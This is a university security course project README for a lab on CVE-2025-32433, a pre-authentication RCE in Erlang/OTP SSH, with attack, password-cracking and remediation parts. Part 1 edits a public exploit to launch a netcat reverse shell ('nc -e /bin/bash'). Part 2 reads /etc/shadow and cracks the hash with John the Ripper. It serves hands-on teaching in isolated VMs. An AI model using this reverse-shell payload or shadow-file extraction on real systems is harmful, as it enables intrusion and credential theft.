Exploit for Missing Authentication for Critical Function in Erlang Erlang\/Otp CVE-2025-32433

## https://sploitus.com/exploit?id=305568CC-85F7-5A1B-8FAE-834B17D0B008
# Information Security Fundamentals — Spring 2026 Project

**Total Points:** 20 | **Deadline:** No late submissions accepted

## Overview

This project simulates a real-world attack-and-defend scenario across two virtual machines. You will exploit a critical pre-authentication RCE vulnerability (CVE-2025-32433) in an Erlang/OTP SSH server, crack extracted password hashes, and then harden the victim machine with firewall rules and patching.

| Role     | OS                                     |
|----------|----------------------------------------|
| Attacker | Kali Linux                             |
| Victim   | Ubuntu/Debian (Erlang/OTP SSH v27.3.2) |

## Files

| File | Description |
|------|-------------|
| `Debian-1.ova` | Pre-built victim VM image — **download separately, see [Resources](#resources)** (too large for GitHub) |
| `Project Spring 2026 - Google Docs.pdf` | Full project instructions with deliverables |
| `rockyou_txt.txt` | Wordlist used with John the Ripper to crack the extracted password hash |

## Resources

- **Victim VM (`Debian-1.ova`)**: [Download link](PASTE_VM_LINK_HERE) — too large (~3GB) to host on GitHub. Download separately and import into VirtualBox/VMware as described below.
- **Wordlist (`rockyou_txt.txt`)**: included in this repository, used for the password cracking step in Part 2.

## Setup

1. **Import VMs** — Load `Debian-1.ova` and your Kali Linux VM into VirtualBox/VMware.
2. **Network** — Set both VMs to **Host-Only Adapter** so they can communicate privately.
3. **Victim IP** — Boot the victim and run `ifconfig` to find its IP (typically in `192.168.56.0/24`).

---

## Part 1 — Vulnerable SSH Server Deployment & Exploitation (10 pts)

### Reconnaissance
```bash
nmap -p 2222 -sV -A 
```
Document open ports, service versions, and Erlang signatures.

### Exploit CVE-2025-32433 (Pre-Auth RCE)

> **Temporarily switch Kali to NAT** to clone the repo, then switch back to Host-Only.

```bash
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py
```

Edit the script — set `HOST = ""` and update the payload:
```python
command='os:cmd("nc -e /bin/bash  4444").'
```

**Terminal 1 (Kali)** — start listener:
```bash
nc -lvnp 4444
```

**Terminal 2 (Kali)** — launch exploit:
```bash
python3 CVE-2025-32433.py
```

In the reverse shell, run `whoami` and `hostname` to confirm access.

---

## Part 2 — Post-Exploitation & Password Cracking (5 pts)

### Extract and Crack the Hash
```bash
# On victim (via reverse shell)
cat /etc/shadow | grep testuser > hash.txt

# On Kali
john --wordlist=rockyou_txt.txt hash.txt
```
Document the hash format (e.g., `$6$` = SHA-512), time taken, and the recovered plaintext password.

### Find the Flag
```bash
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt
```

---

## Part 3 — Controls & Remediation (5 pts)

### Block the Attack Vector (iptables)
```bash
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP
```
Re-run the Nmap scan and the exploit from Kali — document that port 2222 is now "Filtered" and the exploit fails.

### Patch the Vulnerability
Document the steps to upgrade Erlang/OTP to **v27.3.3 or later**, which contains the fix for CVE-2025-32433.

---

## Deliverables

- Full report with screenshots of: scan, exploit execution, reverse shell (`whoami`/`hostname`), flag capture
- Firewall before/after documentation (Nmap results showing port state change)
- Written reflection explaining why Pre-Authentication RCEs are significantly more dangerous than post-auth exploits

---

## CVE Reference

**CVE-2025-32433** — Critical pre-authentication remote code execution in Erlang/OTP SSH server. Exploitable by sending malformed SSH packets before any credential exchange, giving an unauthenticated attacker full shell access.